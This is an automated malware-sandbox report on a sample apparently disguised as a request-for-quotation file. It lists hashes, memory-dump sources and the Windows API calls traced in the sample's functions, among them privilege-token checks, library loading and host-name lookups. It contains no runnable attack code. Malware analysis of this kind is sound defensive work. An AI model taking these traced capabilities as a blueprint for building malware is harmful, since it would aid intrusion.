                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2864067406-0
                                                                                                                                                                                                                              • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                                                                                              • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                                                                                                • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                                                                                                • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                                                                                                • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                                                                                                                                                              • _memcmp.LIBCMT ref: 004586C6
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1592001646-0
                                                                                                                                                                                                                              • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                                                                                              • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __setmode.LIBCMT ref: 004209AE
                                                                                                                                                                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                                                                                              • _fprintf.LIBCMT ref: 004209E5
                                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                                                                                                                                                                • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                                                                                                                                                              • __setmode.LIBCMT ref: 00420A1A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 521402451-0
                                                                                                                                                                                                                              • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                                                                                              • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00435101
                                                                                                                                                                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                                                                              • Opcode ID: 455def05f82d6ece4116c444a04a26e136383c28429caaaae3ef3c9d90cfa316
                                                                                                                                                                                                                              • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 455def05f82d6ece4116c444a04a26e136383c28429caaaae3ef3c9d90cfa316
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004044CF
                                                                                                                                                                                                                                • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                                                                                                                                                                • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                                                                                                • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1378193009-0
                                                                                                                                                                                                                              • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                                                                                              • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 004763D1
                                                                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1504782959-0
                                                                                                                                                                                                                              • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                                                                                                                                                                                              • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                              • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                                                                                              • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0043B605
                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4127811313-0
                                                                                                                                                                                                                              • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                                                                                              • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B215D8,00000000,00000000,?,00B22132,00B215D8,00000000,00000000,00000000,?,00B22283,00000006,FlsSetValue), ref: 00B221BD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00B22132,00B215D8,00000000,00000000,00000000,?,00B22283,00000006,FlsSetValue,00B36FC4,FlsSetValue,00000000,00000364,?,00B2192D), ref: 00B221C9
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B22132,00B215D8,00000000,00000000,00000000,?,00B22283,00000006,FlsSetValue,00B36FC4,FlsSetValue,00000000), ref: 00B221D7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: c4a8861e3a73662b1d3b8aa24a10cb76d43a5b1548970d01c524485daf07bcc9
                                                                                                                                                                                                                              • Instruction ID: 52fca7e9abcd5fa480f7c5734de7f71f61585a16a56a5766848bc44352444ef4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4a8861e3a73662b1d3b8aa24a10cb76d43a5b1548970d01c524485daf07bcc9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19018472611232BBC7314B68FC45E567BD8EF56BA2B210660EA1AF7150DB21DD22C6F0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                                                                              • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                                                                                                              • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                                                                                              • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                                                                                                                                                                • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00466C09
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00466C16
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 48991266-0
                                                                                                                                                                                                                              • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                                                                                              • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 00402231
